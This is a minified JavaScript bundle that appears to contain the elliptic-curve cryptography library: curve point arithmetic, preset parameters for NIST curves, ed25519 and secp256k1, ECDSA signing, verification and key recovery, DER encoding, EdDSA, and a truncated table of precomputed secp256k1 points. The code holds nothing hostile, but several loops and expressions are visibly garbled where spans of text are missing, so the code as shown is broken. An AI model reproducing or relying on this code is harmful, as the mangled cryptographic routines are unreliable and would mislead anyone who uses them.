_=this.endo.basis,y=_[0],A=_[1],p=A.b.mul(b).divRound(this.n),D=y.b.neg().mul(b).divRound(this.n),w=p.mul(y.a),x=D.mul(A.a),S=p.mul(y.b),O=D.mul(A.b);return{k1:b.sub(w).sub(x),k2:S.add(O).neg()}},$.prototype.pointFromX=function(b,_){(b=new j(b,16)).red||(b=b.toRed(this.red));var y=b.redSqr().redMul(b).redIAdd(b.redMul(this.a)).redIAdd(this.b),A=y.redSqrt();if(0!==A.redSqr().redSub(y).cmp(this.zero))throw new Error("invalid point");var p=A.fromRed().isOdd();return(_&&!p||!_&&p)&&(A=A.redNeg()),this.point(b,A)},$.prototype.validate=function(b){if(b.inf)return!0;var _=b.x,y=b.y,A=this.a.redMul(_),p=_.redSqr().redMul(_).redIAdd(A).redIAdd(this.b);return 0===y.redSqr().redISub(p).cmpn(0)},$.prototype._endoWnafMulAdd=function(b,_,y){for(var A=this._endoWnafT1,p=this._endoWnafT2,D=0;D":""},U.prototype.isInfinity=function(){return this.inf},U.prototype.add=function(b){if(this.inf)return b;if(b.inf)return this;if(this.eq(b))return this.dbl();if(this.neg().eq(b))return this.curve.point(null,null);if(0===this.x.cmp(b.x))return this.curve.point(null,null);var _=this.y.redSub(b.y);0!==_.cmpn(0)&&(_=_.redMul(this.x.redSub(b.x).redInvm()));var y=_.redSqr().redISub(this.x).redISub(b.x),A=_.redMul(this.x.redSub(y)).redISub(this.y);return this.curve.point(y,A)},U.prototype.dbl=function(){if(this.inf)return this;var b=this.y.redAdd(this.y);if(0===b.cmpn(0))return this.curve.point(null,null);var _=this.curve.a,y=this.x.redSqr(),A=b.redInvm(),p=y.redAdd(y).redIAdd(y).redIAdd(_).redMul(A),D=p.redSqr().redISub(this.x.redAdd(this.x)),w=p.redMul(this.x.redSub(D)).redISub(this.y);return this.curve.point(D,w)},U.prototype.getX=function(){return this.x.fromRed()},U.prototype.getY=function(){return this.y.fromRed()},U.prototype.mul=function(b){return b=new j(b,16),this.isInfinity()?this:this._hasDoubles(b)?this.curve._fixedNafMul(this,b):this.curve.endo?this.curve._endoWnafMulAdd([this],[b]):this.curve._wnafMul(this,b)},U.prototype.mulAdd=function(b,_,y){var A=[this,_],p=[b,y];return this.curve.endo?this.curve._endoWnafMulAdd(A,p):this.curve._wnafMulAdd(1,A,p,2)},U.prototype.jmulAdd=function(b,_,y){var A=[this,_],p=[b,y];return this.curve.endo?this.curve._endoWnafMulAdd(A,p,!0):this.curve._wnafMulAdd(1,A,p,2,!0)},U.prototype.eq=function(b){return this===b||this.inf===b.inf&&(this.inf||0===this.x.cmp(b.x)&&0===this.y.cmp(b.y))},U.prototype.neg=function(b){if(this.inf)return this;var _=this.curve.point(this.x,this.y.redNeg());if(b&&this.precomputed){var y=this.precomputed,A=function(p){return p.neg()};_.precomputed={naf:y.naf&&{wnd:y.naf.wnd,points:y.naf.points.map(A)},doubles:y.doubles&&{step:y.doubles.step,points:y.doubles.points.map(A)}}}return _},U.prototype.toJ=function(){return this.inf?this.curve.jpoint(null,null,null):this.curve.jpoint(this.x,this.y,this.curve.one)},Q(E,ae.BasePoint),$.prototype.jpoint=function(b,_,y){return new E(this,b,_,y)},E.prototype.toP=function(){if(this.isInfinity())return this.curve.point(null,null);var b=this.z.redInvm(),_=b.redSqr(),y=this.x.redMul(_),A=this.y.redMul(_).redMul(b);return this.curve.point(y,A)},E.prototype.neg=function(){return this.curve.jpoint(this.x,this.y.redNeg(),this.z)},E.prototype.add=function(b){if(this.isInfinity())return b;if(b.isInfinity())return this;var _=b.z.redSqr(),y=this.z.redSqr(),A=this.x.redMul(_),p=b.x.redMul(y),D=this.y.redMul(_.redMul(b.z)),w=b.y.redMul(y.redMul(this.z)),x=A.redSub(p),S=D.redSub(w);if(0===x.cmpn(0))return 0!==S.cmpn(0)?this.curve.jpoint(null,null,null):this.dbl();var O=x.redSqr(),B=O.redMul(x),K=A.redMul(O),ee=S.redSqr().redIAdd(B).redISub(K).redISub(K),se=S.redMul(K.redISub(ee)).redISub(D.redMul(B)),ve=this.z.redMul(b.z).redMul(x);return this.curve.jpoint(ee,se,ve)},E.prototype.mixedAdd=function(b){if(this.isInfinity())return b.toJ();if(b.isInfinity())return this;var _=this.z.redSqr(),y=this.x,A=b.x.redMul(_),p=this.y,D=b.y.redMul(_).redMul(this.z),w=y.redSub(A),x=p.redSub(D);if(0===w.cmpn(0))return 0!==x.cmpn(0)?this.curve.jpoint(null,null,null):this.dbl();var S=w.redSqr(),O=S.redMul(w),B=y.redMul(S),K=x.redSqr().redIAdd(O).redISub(B).redISub(B),ee=x.redMul(B.redISub(K)).redISub(p.redMul(O)),se=this.z.redMul(w);return this.curve.jpoint(K,ee,se)},E.prototype.dblp=function(b){if(0===b)return this;if(this.isInfinity())return this;if(!b)return this.dbl();var _;if(this.curve.zeroA||this.curve.threeA){var y=this;for(_=0;_=0)return!1;if(y.redIAdd(p),0===this.x.cmp(y))return!0}},E.prototype.inspect=function(){return this.isInfinity()?"":""},E.prototype.isInfinity=function(){return 0===this.z.cmpn(0)}},1915:(Pe,we,de)=>{"use strict";var E,ie=we,j=de(8414),Q=de(6186),I=de(7e3).assert;function $(C){this.curve="short"===C.type?new Q.short(C):"edwards"===C.type?new Q.edwards(C):new Q.mont(C),this.g=this.curve.g,this.n=this.curve.n,this.hash=C.hash,I(this.g.validate(),"Invalid curve"),I(this.g.mul(this.n).isInfinity(),"Invalid curve, G*N != O")}function U(C,b){Object.defineProperty(ie,C,{configurable:!0,enumerable:!0,get:function(){var _=new $(b);return Object.defineProperty(ie,C,{configurable:!0,enumerable:!0,value:_}),_}})}ie.PresetCurve=$,U("p192",{type:"short",prime:"p192",p:"ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff",a:"ffffffff ffffffff ffffffff fffffffe ffffffff fffffffc",b:"64210519 e59c80e7 0fa7e9ab 72243049 feb8deec c146b9b1",n:"ffffffff ffffffff ffffffff 99def836 146bc9b1 b4d22831",hash:j.sha256,gRed:!1,g:["188da80e b03090f6 7cbf20eb 43a18800 f4ff0afd 82ff1012","07192b95 ffc8da78 631011ed 6b24cdd5 73f977a1 1e794811"]}),U("p224",{type:"short",prime:"p224",p:"ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001",a:"ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff fffffffe",b:"b4050a85 0c04b3ab f5413256 5044b0b7 d7bfd8ba 270b3943 2355ffb4",n:"ffffffff ffffffff ffffffff ffff16a2 e0b8f03e 13dd2945 5c5c2a3d",hash:j.sha256,gRed:!1,g:["b70e0cbd 6bb4bf7f 321390b9 4a03c1d3 56c21122 343280d6 115c1d21","bd376388 b5f723fb 4c22dfe6 cd4375a0 5a074764 44d58199 85007e34"]}),U("p256",{type:"short",prime:null,p:"ffffffff 00000001 00000000 00000000 00000000 ffffffff ffffffff ffffffff",a:"ffffffff 00000001 00000000 00000000 00000000 ffffffff ffffffff fffffffc",b:"5ac635d8 aa3a93e7 b3ebbd55 769886bc 651d06b0 cc53b0f6 3bce3c3e 27d2604b",n:"ffffffff 00000000 ffffffff ffffffff bce6faad a7179e84 f3b9cac2 fc632551",hash:j.sha256,gRed:!1,g:["6b17d1f2 e12c4247 f8bce6e5 63a440f2 77037d81 2deb33a0 f4a13945 d898c296","4fe342e2 fe1a7f9b 8ee7eb4a 7c0f9e16 2bce3357 6b315ece cbb64068 37bf51f5"]}),U("p384",{type:"short",prime:null,p:"ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe ffffffff 00000000 00000000 ffffffff",a:"ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe ffffffff 00000000 00000000 fffffffc",b:"b3312fa7 e23ee7e4 988e056b e3f82d19 181d9c6e fe814112 0314088f 5013875a c656398d 8a2ed19d 2a85c8ed d3ec2aef",n:"ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff c7634d81 f4372ddf 581a0db2 48b0a77a ecec196a ccc52973",hash:j.sha384,gRed:!1,g:["aa87ca22 be8b0537 8eb1c71e f320ad74 6e1d3b62 8ba79b98 59f741e0 82542a38 5502f25d bf55296c 3a545e38 72760ab7","3617de4a 96262c6f 5d9e98bf 9292dc29 f8f41dbd 289a147c e9da3113 b5f0b8c0 0a60b1ce 1d7e819d 7a431d7c 90ea0e5f"]}),U("p521",{type:"short",prime:null,p:"000001ff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff",a:"000001ff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffc",b:"00000051 953eb961 8e1c9a1f 929a21a0 b68540ee a2da725b 99b315f3 b8b48991 8ef109e1 56193951 ec7e937b 1652c0bd 3bb1bf07 3573df88 3d2c34f1 ef451fd4 6b503f00",n:"000001ff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffa 51868783 bf2f966b 7fcc0148 f709a5d0 3bb5c9b8 899c47ae bb6fb71e 91386409",hash:j.sha512,gRed:!1,g:["000000c6 858e06b7 0404e9cd 9e3ecb66 2395b442 9c648139 053fb521 f828af60 6b4d3dba a14b5e77 efe75928 fe1dc127 a2ffa8de 3348b3c1 856a429b f97e7e31 c2e5bd66","00000118 39296a78 9a3bc004 5c8a5fb4 2c7d1bd9 98f54449 579b4468 17afbd17 273e662c 97ee7299 5ef42640 c550b901 3fad0761 353c7086 a272c240 88be9476 9fd16650"]}),U("curve25519",{type:"mont",prime:"p25519",p:"7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed",a:"76d06",b:"1",n:"1000000000000000 0000000000000000 14def9dea2f79cd6 5812631a5cf5d3ed",hash:j.sha256,gRed:!1,g:["9"]}),U("ed25519",{type:"edwards",prime:"p25519",p:"7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed",a:"-1",c:"1",d:"52036cee2b6ffe73 8cc740797779e898 00700a4d4141d8ab 75eb4dca135978a3",n:"1000000000000000 0000000000000000 14def9dea2f79cd6 5812631a5cf5d3ed",hash:j.sha256,gRed:!1,g:["216936d3cd6e53fec0a4e231fdd6dc5c692cc7609525a7b2c9562d608f25d51a","6666666666666666666666666666666666666666666666666666666666666658"]});try{E=de(5862)}catch(C){E=void 0}U("secp256k1",{type:"short",prime:"k256",p:"ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f",a:"0",b:"7",n:"ffffffff ffffffff ffffffff fffffffe baaedce6 af48a03b bfd25e8c d0364141",h:"1",hash:j.sha256,beta:"7ae96a2b657c07106e64479eac3434e99cf0497512f58995c1396c28719501ee",lambda:"5363ad4cc05c30e0a5261c028812645a122e22ea20816678df02967c1b23bd72",basis:[{a:"3086d221a7d46bcde86c90e49284eb15",b:"-e4437ed6010e88286f547fa90abfe4c3"},{a:"114ca50f7a8e2f3f657c1108d9d44cfd8",b:"3086d221a7d46bcde86c90e49284eb15"}],gRed:!1,g:["79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798","483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8",E]})},7949:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(8116),Q=de(7e3),ae=de(1915),I=de(9598),$=Q.assert,U=de(4602),E=de(7327);function C(b){if(!(this instanceof C))return new C(b);"string"==typeof b&&($(Object.prototype.hasOwnProperty.call(ae,b),"Unknown curve "+b),b=ae[b]),b instanceof ae.PresetCurve&&(b={curve:b}),this.curve=b.curve.curve,this.n=this.curve.n,this.nh=this.n.ushrn(1),this.g=this.curve.g,this.g=b.curve.g,this.g.precompute(b.curve.n.bitLength()+1),this.hash=b.hash||b.curve.hash}Pe.exports=C,C.prototype.keyPair=function(_){return new U(this,_)},C.prototype.keyFromPrivate=function(_,y){return U.fromPrivate(this,_,y)},C.prototype.keyFromPublic=function(_,y){return U.fromPublic(this,_,y)},C.prototype.genKeyPair=function(_){_||(_={});for(var y=new j({hash:this.hash,pers:_.pers,persEnc:_.persEnc||"utf8",entropy:_.entropy||I(this.hash.hmacStrength),entropyEnc:_.entropy&&_.entropyEnc||"utf8",nonce:this.n.toArray()}),A=this.n.byteLength(),p=this.n.sub(new ie(2));;){var D=new ie(y.generate(A));if(!(D.cmp(p)>0))return D.iaddn(1),this.keyFromPrivate(D)}},C.prototype._truncateToN=function(_,y){var A=8*_.byteLength()-this.n.bitLength();return A>0&&(_=_.ushrn(A)),!y&&_.cmp(this.n)>=0?_.sub(this.n):_},C.prototype.sign=function(_,y,A,p){"object"==typeof A&&(p=A,A=null),p||(p={}),y=this.keyFromPrivate(y,A),_=this._truncateToN(new ie(_,16));for(var D=this.n.byteLength(),w=y.getPrivate().toArray("be",D),x=_.toArray("be",D),S=new j({hash:this.hash,entropy:w,nonce:x,pers:p.pers,persEnc:p.persEnc||"utf8"}),O=this.n.sub(new ie(1)),B=0;;B++){var K=p.k?p.k(B):new ie(S.generate(this.n.byteLength()));if(!((K=this._truncateToN(K,!0)).cmpn(1)<=0||K.cmp(O)>=0)){var ee=this.g.mul(K);if(!ee.isInfinity()){var se=ee.getX(),ve=se.umod(this.n);if(0!==ve.cmpn(0)){var le=K.invm(this.n).mul(ve.mul(y.getPrivate()).iadd(_));if(0!==(le=le.umod(this.n)).cmpn(0)){var ye=(ee.getY().isOdd()?1:0)|(0!==se.cmp(ve)?2:0);return p.canonical&&le.cmp(this.nh)>0&&(le=this.n.sub(le),ye^=1),new E({r:ve,s:le,recoveryParam:ye})}}}}}},C.prototype.verify=function(_,y,A,p){_=this._truncateToN(new ie(_,16)),A=this.keyFromPublic(A,p);var D=(y=new E(y,"hex")).r,w=y.s;if(D.cmpn(1)<0||D.cmp(this.n)>=0||w.cmpn(1)<0||w.cmp(this.n)>=0)return!1;var B,x=w.invm(this.n),S=x.mul(_).umod(this.n),O=x.mul(D).umod(this.n);return this.curve._maxwellTrick?!(B=this.g.jmulAdd(S,A.getPublic(),O)).isInfinity()&&B.eqXToP(D):!(B=this.g.mulAdd(S,A.getPublic(),O)).isInfinity()&&0===B.getX().umod(this.n).cmp(D)},C.prototype.recoverPubKey=function(b,_,y,A){$((3&y)===y,"The recovery param is more than two bits"),_=new E(_,A);var p=this.n,D=new ie(b),w=_.r,x=_.s,S=1&y,O=y>>1;if(w.cmp(this.curve.p.umod(this.curve.n))>=0&&O)throw new Error("Unable to find sencond key candinate");w=this.curve.pointFromX(O?w.add(this.curve.n):w,S);var B=_.r.invm(p),K=p.sub(D).mul(B).umod(p),ee=x.mul(B).umod(p);return this.g.mulAdd(K,w,ee)},C.prototype.getKeyRecoveryParam=function(b,_,y,A){if(null!==(_=new E(_,A)).recoveryParam)return _.recoveryParam;for(var p=0;p<4;p++){var D;try{D=this.recoverPubKey(b,_,p)}catch(w){continue}if(D.eq(y))return p}throw new Error("Unable to find valid recovery factor")}},4602:(Pe,we,de)=>{"use strict";var ie=de(1959),Q=de(7e3).assert;function ae(I,$){this.ec=I,this.priv=null,this.pub=null,$.priv&&this._importPrivate($.priv,$.privEnc),$.pub&&this._importPublic($.pub,$.pubEnc)}Pe.exports=ae,ae.fromPublic=function($,U,E){return U instanceof ae?U:new ae($,{pub:U,pubEnc:E})},ae.fromPrivate=function($,U,E){return U instanceof ae?U:new ae($,{priv:U,privEnc:E})},ae.prototype.validate=function(){var $=this.getPublic();return $.isInfinity()?{result:!1,reason:"Invalid public key"}:$.validate()?$.mul(this.ec.curve.n).isInfinity()?{result:!0,reason:null}:{result:!1,reason:"Public key * N != O"}:{result:!1,reason:"Public key is not a point"}},ae.prototype.getPublic=function($,U){return"string"==typeof $&&(U=$,$=null),this.pub||(this.pub=this.ec.g.mul(this.priv)),U?this.pub.encode(U,$):this.pub},ae.prototype.getPrivate=function($){return"hex"===$?this.priv.toString(16,2):this.priv},ae.prototype._importPrivate=function($,U){this.priv=new ie($,U||16),this.priv=this.priv.umod(this.ec.curve.n)},ae.prototype._importPublic=function($,U){if($.x||$.y)return"mont"===this.ec.curve.type?Q($.x,"Need x coordinate"):("short"===this.ec.curve.type||"edwards"===this.ec.curve.type)&&Q($.x&&$.y,"Need both x and y coordinate"),void(this.pub=this.ec.curve.point($.x,$.y));this.pub=this.ec.curve.decodePoint($,U)},ae.prototype.derive=function($){return $.validate()||Q($.validate(),"public point not validated"),$.mul(this.priv).getX()},ae.prototype.sign=function($,U,E){return this.ec.sign($,this,U,E)},ae.prototype.verify=function($,U){return this.ec.verify($,U,this)},ae.prototype.inspect=function(){return""}},7327:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(7e3),Q=j.assert;function ae(C,b){if(C instanceof ae)return C;this._importDER(C,b)||(Q(C.r&&C.s,"Signature without r or s"),this.r=new ie(C.r,16),this.s=new ie(C.s,16),this.recoveryParam=void 0===C.recoveryParam?null:C.recoveryParam)}function I(){this.place=0}function $(C,b){var _=C[b.place++];if(!(128&_))return _;var y=15&_;if(0===y||y>4)return!1;for(var A=0,p=0,D=b.place;p>>=0;return!(A<=127)&&(b.place=D,A)}function U(C){for(var b=0,_=C.length-1;!C[b]&&!(128&C[b+1])&&b<_;)b++;return 0===b?C:C.slice(b)}function E(C,b){if(b<128)C.push(b);else{var _=1+(Math.log(b)/Math.LN2>>>3);for(C.push(128|_);--_;)C.push(b>>>(_<<3)&255);C.push(b)}}Pe.exports=ae,ae.prototype._importDER=function(b,_){b=j.toArray(b,_);var y=new I;if(48!==b[y.place++])return!1;var A=$(b,y);if(!1===A||A+y.place!==b.length||2!==b[y.place++])return!1;var p=$(b,y);if(!1===p)return!1;var D=b.slice(y.place,p+y.place);if(y.place+=p,2!==b[y.place++])return!1;var w=$(b,y);if(!1===w||b.length!==w+y.place)return!1;var x=b.slice(y.place,w+y.place);if(0===D[0]){if(!(128&D[1]))return!1;D=D.slice(1)}if(0===x[0]){if(!(128&x[1]))return!1;x=x.slice(1)}return this.r=new ie(D),this.s=new ie(x),this.recoveryParam=null,!0},ae.prototype.toDER=function(b){var _=this.r.toArray(),y=this.s.toArray();for(128&_[0]&&(_=[0].concat(_)),128&y[0]&&(y=[0].concat(y)),_=U(_),y=U(y);!(y[0]||128&y[1]);)y=y.slice(1);var A=[2];E(A,_.length),(A=A.concat(_)).push(2),E(A,y.length);var p=A.concat(y),D=[48];return E(D,p.length),D=D.concat(p),j.encode(D,b)}},8593:(Pe,we,de)=>{"use strict";var ie=de(8414),j=de(1915),Q=de(7e3),ae=Q.assert,I=Q.parseBytes,$=de(993),U=de(2131);function E(C){if(ae("ed25519"===C,"only tested with ed25519 so far"),!(this instanceof E))return new E(C);this.curve=C=j[C].curve,this.g=C.g,this.g.precompute(C.n.bitLength()+1),this.pointClass=C.point().constructor,this.encodingLength=Math.ceil(C.n.bitLength()/8),this.hash=ie.sha512}Pe.exports=E,E.prototype.sign=function(b,_){b=I(b);var y=this.keyFromSecret(_),A=this.hashInt(y.messagePrefix(),b),p=this.g.mul(A),D=this.encodePoint(p),w=this.hashInt(D,y.pubBytes(),b).mul(y.priv()),x=A.add(w).umod(this.curve.n);return this.makeSignature({R:p,S:x,Rencoded:D})},E.prototype.verify=function(b,_,y){b=I(b),_=this.makeSignature(_);var A=this.keyFromPublic(y),p=this.hashInt(_.Rencoded(),A.pubBytes(),b),D=this.g.mul(_.S());return _.R().add(A.pub().mul(p)).eq(D)},E.prototype.hashInt=function(){for(var b=this.hash(),_=0;_{"use strict";var ie=de(7e3),j=ie.assert,Q=ie.parseBytes,ae=ie.cachedProperty;function I($,U){this.eddsa=$,this._secret=Q(U.secret),$.isPoint(U.pub)?this._pub=U.pub:this._pubBytes=Q(U.pub)}I.fromPublic=function(U,E){return E instanceof I?E:new I(U,{pub:E})},I.fromSecret=function(U,E){return E instanceof I?E:new I(U,{secret:E})},I.prototype.secret=function(){return this._secret},ae(I,"pubBytes",function(){return this.eddsa.encodePoint(this.pub())}),ae(I,"pub",function(){return this._pubBytes?this.eddsa.decodePoint(this._pubBytes):this.eddsa.g.mul(this.priv())}),ae(I,"privBytes",function(){var U=this.eddsa,E=this.hash(),C=U.encodingLength-1,b=E.slice(0,U.encodingLength);return b[0]&=248,b[C]&=127,b[C]|=64,b}),ae(I,"priv",function(){return this.eddsa.decodeInt(this.privBytes())}),ae(I,"hash",function(){return this.eddsa.hash().update(this.secret()).digest()}),ae(I,"messagePrefix",function(){return this.hash().slice(this.eddsa.encodingLength)}),I.prototype.sign=function(U){return j(this._secret,"KeyPair can only verify"),this.eddsa.sign(U,this)},I.prototype.verify=function(U,E){return this.eddsa.verify(U,E,this)},I.prototype.getSecret=function(U){return j(this._secret,"KeyPair is public only"),ie.encode(this.secret(),U)},I.prototype.getPublic=function(U){return ie.encode(this.pubBytes(),U)},Pe.exports=I},2131:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(7e3),Q=j.assert,ae=j.cachedProperty,I=j.parseBytes;function $(U,E){this.eddsa=U,"object"!=typeof E&&(E=I(E)),Array.isArray(E)&&(E={R:E.slice(0,U.encodingLength),S:E.slice(U.encodingLength)}),Q(E.R&&E.S,"Signature without R or S"),U.isPoint(E.R)&&(this._R=E.R),E.S instanceof ie&&(this._S=E.S),this._Rencoded=Array.isArray(E.R)?E.R:E.Rencoded,this._Sencoded=Array.isArray(E.S)?E.S:E.Sencoded}ae($,"S",function(){return this.eddsa.decodeInt(this.Sencoded())}),ae($,"R",function(){return this.eddsa.decodePoint(this.Rencoded())}),ae($,"Rencoded",function(){return this.eddsa.encodePoint(this.R())}),ae($,"Sencoded",function(){return this.eddsa.encodeInt(this.S())}),$.prototype.toBytes=function(){return this.Rencoded().concat(this.Sencoded())},$.prototype.toHex=function(){return j.encode(this.toBytes(),"hex").toUpperCase()},Pe.exports=$},5862:Pe=>{Pe.exports={doubles:{step:4,points:[["e60fce93b59e9ec53011aabc21c23e97b2a31369b87a5ae9c44ee89e2a6dec0a","f7e3507399e595929db99f34f57937101296891e44d23f0be1f32cce69616821"],["8282263212c609d9ea2a6e3e172de238d8c39cabd5ac1ca10646e23fd5f51508","11f8a8098557dfe45e8256e830b60ace62d613ac2f7b17bed31b6eaff6e26caf"],["175e159f728b865a72f99cc6c6fc846de0b93833fd2222ed73fce5b551e5b739","d3506e0d9e3c79eba4ef97a51ff71f5eacb5955add24345c6efa6ffee9fed695"],["363d90d447b00c9c99ceac05b6262ee053441c7e55552ffe526bad8f83ff4640","4e273adfc732221953b445397f3363145b9a89008199ecb62003c7f3bee9de9"],["8b4b5f165df3c2be8c6244b5b745638843e4a781a15bcd1b69f79a55dffdf80c","4aad0a6f68d308b4b3fbd7813ab0da04f9e336546162ee56b3eff0c65fd4fd36"],["723cbaa6e5db996d6bf771c00bd548c7b700dbffa6c0e77bcb6115925232fcda","96e867b5595cc498a921137488824d6e2660a0653779494801dc069d9eb39f5f"],["eebfa4d493bebf98ba5feec812c2d3b50947961237a919839a533eca0e7dd7fa","5d9a8ca3970ef0f269ee7edaf178089d9ae4cdc3a711f712ddfd4fdae1de8999"],["100f44da696e71672791d0a09b7bde459f1215a29b3c03bfefd7835b39a48db0","cdd9e13192a00b772ec8f3300c090666b7ff4a18ff5195ac0fbd5cd62bc65a09"],["e1031be262c7ed1b1dc9227a4a04c017a77f8d4464f3b3852c8acde6e534fd2d","9d7061928940405e6bb6a4176597535af292dd419e1ced79a44f18f29456a00d"],["feea6cae46d55b530ac2839f143bd7ec5cf8b266a41d6af52d5e688d9094696d","e57c6b6c97dce1bab06e4e12bf3ecd5c981c8957cc41442d3155debf18090088"],["da67a91d91049cdcb367be4be6ffca3cfeed657d808583de33fa978bc1ec6cb1","9bacaa35481642bc41f463f7ec9780e5dec7adc508f740a17e9ea8e27a68be1d"],["53904faa0b334cdda6e000935ef22151ec08d0f7bb11069f57545ccc1a37b7c0","5bc087d0bc80106d88c9eccac20d3c1c13999981e14434699dcb096b022771c8"],["8e7bcd0bd35983a7719cca7764ca906779b53a043a9b8bcaeff959f43ad86047","10b7770b2a3da4b3940310420ca9514579e88e2e47fd68b3ea10047e8460372a"],["385eed34c1cdff21e6d0818689b81bde71a7f4f18397e6690a841e1599c43862","283bebc3e8ea23f56701de19e9ebf4576b304eec2086dc8cc0458fe5542e5453"],["6f9d9b803ecf191637c73a4413dfa180fddf84a5947fbc9c606ed86c3fac3a7","7c80c68e603059ba69b8e2a30e45c4d47ea4dd2f5c281002d86890603a842160"],["3322d401243c4e2582a2147c104d6ecbf774d163db0f5e5313b7e0e742d0e6bd","56e70797e9664ef5bfb019bc4ddaf9b72805f63ea2873af624f3a2e96c28b2a0"],["85672c7d2de0b7da2bd1770d89665868741b3f9af7643397721d74d28134ab83","7c481b9b5b43b2eb6374049bfa62c2e5e77f17fcc5298f44c8e3094f790313a6"],["948bf809b1988a46b06c9f1919413b10f9226c60f668832ffd959af60c82a0a","53a562856dcb6646dc6b74c5d1c3418c6d4dff08c97cd2bed4cb7f88d8c8e589"],["6260ce7f461801c34f067ce0f02873a8f1b0e44dfc69752accecd819f38fd8e8","bc2da82b6fa5b571a7f09049776a1ef7ecd292238051c198c1a84e95b2b4ae17"],["e5037de0afc1d8d43d8348414bbf4103043ec8f575bfdc432953cc8d2037fa2d","4571534baa94d3b5f9f98d09fb990bddbd5f5b03ec481f10e0e5dc841d755bda"],["e06372b0f4a207adf5ea905e8f1771b4e7e8dbd1c6a6c5b725866a0ae4fce725","7a908974bce18cfe12a27bb2ad5a488cd7484a7787104870b27034f94eee31dd"],["213c7a715cd5d45358d0bbf9dc0ce02204b10bdde2a3f58540ad6908d0559754","4b6dad0b5ae462507013ad06245ba190bb4850f5f36a7eeddff2c27534b458f2"],["4e7c272a7af4b34e8dbb9352a5419a87e2838c70adc62cddf0cc3a3b08fbd53c","17749c766c9d0b18e16fd09f6def681b530b9614bff7dd33e0b3941817dcaae6"],["fea74e3dbe778b1b10f238ad61686aa5c76e3db2be43057632427e2840fb27b6","6e0568db9b0b13297cf674deccb6af93126b596b973f7b77701d3db7f23cb96f"],["76e64113f677cf0e10a2570d599968d31544e179b760432952c02a4417bdde39","c90ddf8dee4e95cf577066d70681f0d35e2a33d2b56d2032b4b1752d1901ac01"],["c738c56b03b2abe1e8281baa743f8f9a8f7cc643df26cbee3ab150242bcbb891","893fb578951ad2537f718f2eacbfbbbb82314eef7880cfe917e735d9699a84c3"],["d895626548b65b81e264c7637c972877d1d72e5f3a925014372e9f6588f6c14b","febfaa38f2bc7eae728ec60818c340eb03428d632bb067e179363ed75d7d991f"],["b8da94032a957518eb0f6433571e8761ceffc73693e84edd49150a564f676e03","2804dfa44805a1e4d7c99cc9762808b092cc584d95ff3b511488e4e74efdf6e7"],["e80fea14441fb33a7d8adab9475d7fab2019effb5156a792f1a11778e3c0df5d","eed1de7f638e00771e89768ca3ca94472d155e80af322ea9fcb4291b6ac9ec78"],["a301697bdfcd704313ba48e51d567543f2a182031efd6915ddc07bbcc4e16070","7370f91cfb67e4f5081809fa25d40f9b1735dbf7c0a11a130c0d1a041e177ea1"],["90ad85b389d6b936463f9d0512678de208cc330b11307fffab7ac63e3fb04ed4","e507a3620a38261affdcbd9427222b839aefabe1582894d991d4d48cb6ef150"],["8f68b9d2f63b5f339239c1ad981f162ee88c5678723ea3351b7b444c9ec4c0da","662a9f2dba063986de1d90c2b6be215dbbea2cfe95510bfdf23cbf79501fff82"],["e4f3fb0176af85d65ff99ff9198c36091f48e86503681e3e6686fd5053231e11","1e63633ad0ef4f1c1661a6d0ea02b7286cc7e74ec951d1c9822c38576feb73bc"],["8c00fa9b18ebf331eb961537a45a4266c7034f2f0d4e1d0716fb6eae20eae29e","efa47267fea521a1a9dc343a3736c974c2fadafa81e36c54e7d2a4c66702414b"],["e7a26ce69dd4829f3e10cec0a9e98ed3143d084f308b92c0997fddfc60cb3e41","2a758e300fa7984b471b006a1aafbb18d0a6b2c0420e83e20e8a9421cf2cfd51"],["b6459e0ee3662ec8d23540c223bcbdc571cbcb967d79424f3cf29eb3de6b80ef","67c876d06f3e06de1dadf16e5661db3c4b3ae6d48e35b2ff30bf0b61a71ba45"],["d68a80c8280bb840793234aa118f06231d6f1fc67e73c5a5deda0f5b496943e8","db8ba9fff4b586d00c4b1f9177b0e28b5b0e7b8f7845295a294c84266b133120"],["324aed7df65c804252dc0270907a30b09612aeb973449cea4095980fc28d3d5d","648a365774b61f2ff130c0c35aec1f4f19213b0c7e332843967224af96ab7c84"],["4df9c14919cde61f6d51dfdbe5fee5dceec4143ba8d1ca888e8bd373fd054c96","35ec51092d8728050974c23a1d85d4b5d506cdc288490192ebac06cad10d5d"],["9c3919a84a474870faed8a9c1cc66021523489054d7f0308cbfc99c8ac1f98cd","ddb84f0f4a4ddd57584f044bf260e641905326f76c64c8e6be7e5e03d4fc599d"],["6057170b1dd12fdf8de05f281d8e06bb91e1493a8b91d4cc5a21382120a959e5","9a1af0b26a6a4807add9a2daf71df262465152bc3ee24c65e899be932385a2a8"],["a576df8e23a08411421439a4518da31880cef0fba7d4df12b1a6973eecb94266","40a6bf20e76640b2c92b97afe58cd82c432e10a7f514d9f3ee8be11ae1b28ec8"],["7778a78c28dec3e30a05fe9629de8c38bb30d1f5cf9a3a208f763889be58ad71","34626d9ab5a5b22ff7098e12f2ff580087b38411ff24ac563b513fc1fd9f43ac"],["928955ee637a84463729fd30e7afd2ed5f96274e5ad7e5cb09eda9c06d903ac","c25621003d3f42a827b78a13093a95eeac3d26efa8a8d83fc5180e935bcd091f"],["85d0fef3ec6db109399064f3a0e3b2855645b4a907ad354527aae75163d82751","1f03648413a38c0be29d496e582cf5663e8751e96877331582c237a24eb1f962"],["ff2b0dce97